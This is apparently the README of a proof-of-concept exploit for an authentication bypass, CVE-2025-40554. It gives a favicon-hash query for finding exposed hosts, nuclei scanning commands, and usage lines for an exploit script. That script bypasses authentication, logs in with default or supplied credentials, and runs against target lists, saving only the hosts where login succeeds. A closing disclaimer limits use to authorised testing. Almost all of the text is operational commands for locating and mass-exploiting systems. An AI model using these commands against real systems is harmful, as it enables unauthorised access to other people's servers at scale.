http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
单目标(绕过 + 登录,默认 client/client):
python3 exploit_auth_bypass.py -t https://TARGET:8443
单目标,使用自定义凭据:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
单目标,仅绕过(不登录):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
目标列表(仅保存漏洞+登录成功):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
目标列表,使用自定义凭据:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
安静模式(仅打印登录成功的 URL):
python3 exploit_auth_bypass.py -l result_all.txt -q
此 PoC 仅用于授权的安全研究与测试。未经授权访问计算机系统属于违法行为。作者对滥用行为不承担任何责任。